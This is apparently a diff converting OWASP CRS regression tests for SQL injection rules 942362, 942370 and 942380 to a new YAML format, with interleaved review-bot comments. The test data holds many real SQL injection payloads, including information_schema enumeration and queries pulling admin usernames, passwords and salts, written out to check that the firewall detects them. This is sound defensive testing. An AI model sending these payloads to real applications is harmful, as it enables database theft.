text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "! As' from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-26 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "! As' from" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 26 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "; As not from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-27 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "; As not from" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 27 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT load_file(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-28 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT load_file(" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 28 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "6 As\" from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-29 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "6 As\" from" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 29 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") as day1 FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-30 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") as day1 FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 30 desc: GH issue 1580 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: ", aside from" - version: HTTP/1.0 - output: - no_log_contains: id "942362" - - test_title: 942362-31 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: ", aside from" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942362] + - test_id: 31 desc: GH issue 1605 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/create" - version: HTTP/1.0 - output: - no_log_contains: id "942362" - - test_title: 942362-32 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "a=/create" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942362] + - test_id: 32 desc: GH issue 1605 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/CREATE TABLE Persons" - version: HTTP/1.0 - output: - log_contains: id "942362" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test 
agent" + method: POST + port: 80 + uri: "/post" + data: "a=/CREATE TABLE Persons" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml index a071e20b2..18ba3f0fa 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml @@ -7,10 +7,9 @@ meta: WARNING: these tests were derived from the existing expressions and are semantically meaningless. The tests were used to ensure that a change to the assembly file would not change the semantics. If you know what a particular expression is supposed to catch, please revise the associated test. - enabled: true - name: 942370.yaml +rule_id: 942370 tests: - - test_title: 942370-1 + - test_id: 1 desc: | [\"'`]\s*?\*.+or\W*?[\"'`]\d [\"'`]\s*?\*.+xor\W*?[\"'`]\d 
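Review bot: The inline comment kept above test 1's payload, `# 23423 as "sdfsdfs" FROM table`, does not describe the data line beneath it, which URL-decodes to `var=1234 AS "foobar" FROM tablevar2=whatever`; replacing it with `# var=1234 AS "foobar" FROM tablevar2=whatever (URL-decoded)` would stop it misleading the next reader. The payload itself reads as if an `&` between `table` and `var2` was lost at some point, but that is an inference and the test still expects 942362 to fire on it, so I would only confirm the intent rather than change the data here. Tests 18 and 23 send the identical payload `) AS schlagwoerter FROM` and both expect 942362, so one of them is redundant and should be dropped or given a distinct case. Test 1's `desc` also lacks the "Detects … attempts" wording used by tests 2–29, which is worth aligning while the file is being rewritten.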
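Review bot: Test 1's `desc` block in this hunk lists several regex alternatives (the `or` and `xor` forms are visible here, with `between` and `and` continuing into the next hunk) for what is a single test with one payload, so only one of those alternatives can actually be exercised by it. Since the meta text above already flags these tests as derived from the expressions and asks for revision, a trailing line in the literal block such as `payload exercises the 'or' alternative only` would make the coverage gap explicit for whoever revises them. The test's stages start outside this hunk.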
@@ -19,93 +18,93 @@ tests: [\"'`]\s*?\*.+between\W*?[\"'`]\d [\"'`]\s*?\*.+and\W*?[\"'`]\d stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=' * from = 1 or '9" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=' * from = 1 or '9" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 2 desc: | [\"'`]\s*?\*.+id\W*?[\"'`]\d stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=' * from = 1 id '9" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=' * from = 1 id '9" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 3 desc: | [^\w\s?]+\s*?[^\w\s]+\s*?[\"'`"] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=' = # '" - version: HTTP/1.0 - output: - log_contains: id 
"942370" - - test_title: 942370-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=' = # '" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 4 desc: | [^\w\s]+\s*?[\W\d].*?# stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=' ? # = #" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=' ? # = #" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 5 desc: | [^\w\s]+\s*?[\W\d].*?-- stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='? # = --" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='? # = --" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 6 desc: | [\"'`]\s*?or\s[^\d]+[\w-]+.*?\d [\"'`]\s*?xor\s[^\d]+[\w-]+.*?\d 
@@ -114,102 +113,102 @@ tests: [\"'`]\s*?between\s[^\d]+[\w-]+.*?\d [\"'`]\s*?and\s[^\d]+[\w-]+.*?\d stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=' or homer 9" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=' or homer 9" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 7 desc: | \^[\"'`] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=^'" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=^'" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 8 desc: | [\"'`].*?\*\s*?\d stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\"` * 12344" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-9 + - input: + dest_addr: 127.0.0.1 + 
headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\"` * 12344" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 9 desc: | [()\*<>%+-][\w-]+[^\w\s]+[\"'`][^,] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=>foo##'." - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=>foo##'." 
+ version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 10 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: 1"and json_search (json_array(password),0b11000010110110001101100,"t_______________")# - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: 1"and json_search (json_array(password),0b11000010110110001101100,"t_______________")# + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 11 desc: encode(lo_get(16400),'base64')::int stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: encode(lo_get(16400),'base64')::int - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942370" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: encode(lo_get(16400),'base64')::int + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml index d229d33f4..c3445da07 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml 
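Review bot: The new `- test_id: 10` entry in this hunk is the only test in the file without a `desc`, while every sibling documents the regex or payload it exercises; since the conversion rewrites the whole entry anyway, add `desc: json_search()/json_array() payload in the User-Agent header` directly under `test_id: 10`. The User-Agent value on that test is an unquoted plain scalar containing `"` and a trailing `#`; it parses as intended today only because the `#` is not preceded by whitespace, so single-quoting it (`User-Agent: '1"and json_search (json_array(password),0b11000010110110001101100,"t_______________")#'`) would make that robustness explicit rather than incidental. The `tests` sequence this hunk edits begins outside the hunk.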
@@ -1,772 +1,770 @@ --- meta: author: "Christoph Hansen, azurit" - description: None - enabled: true - name: 942380.yaml +rule_id: 942380 tests: - - test_title: 942380-1 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from `db_miwf`.`sys_refindex` limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-2 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from(select count(*),concat((select (select (select concat(0x53,0x65,0x61,0x72,0x63,0x68,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x6F,0x72) from `information_schema`.tables limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-3 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from `information_schema`.tables limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-4 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "ORder by" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 
942380-5 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "ordeR by" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-6 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-7 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FROM+termine+GROUP+BY+tag1%26sql_delimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-8 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT 6229 FROM(SELECT COUNT(*),CONCAT(0x717a786a71,(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-9 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - 
port: 80 - uri: "/post" - data: "SELECT CHAR(113)+CHAR(122)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-10 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-11 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT CONCAT(0x717a786a71,(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-12 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT (CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113))||(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-13 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" - version: HTTP/1.0 - 
output: - log_contains: id "942380" - - test_title: 942380-14 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT 'qzxjq'||(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-15 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute php" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-16 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user desc limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-17 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "Execute(" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-18 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from+information_schema.tables+where+BINARY+LEFT%28table_name%2C+1%29+%3D+%27nnn%27+LIMIT" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-19 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from+information_schema.tables+where+table_schema%3Ddatabase%28%29+and+table_name+REGEXP+0x6d656d6265727324+limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-20 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "fromtype%3DvBForum%3ASocialGroupMessage%26do%3Dprocess%26contenttypeid%3D5%26categoryid%5B%5D%3D-99%29+union+select+salt+from+user+where+userid%3D1+and+row%281%2C1%29%3E%28select+count%28%2A%29%2Cconcat%28+%28select+user.salt%29+%2C0x3a%2Cfloor%28rand%280%29%2A2%29%29+x+from+%28select+1+union+select+2+union+select+3%29a+group+by+x+limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-21 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: 
"from%2F%2A%2A%2F%28select%2F%2A%2A%2Fcount%28%2A%29%2Cconcat%28floor%28rand%280%29%2A2%29%2C0x3a%2C%28select%2F%2A%2A%2Fconcat%28user%2C0x3a%2Cpassword%29%2F%2A%2A%2Ffrom%2F%2A%2A%2Fpwn_base_admin%2F%2A%2A%2Flimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-22 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "HAVING+1%3D" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-23 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute+elysi" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-24 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%283419%3D3419%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29%26limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-25 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 
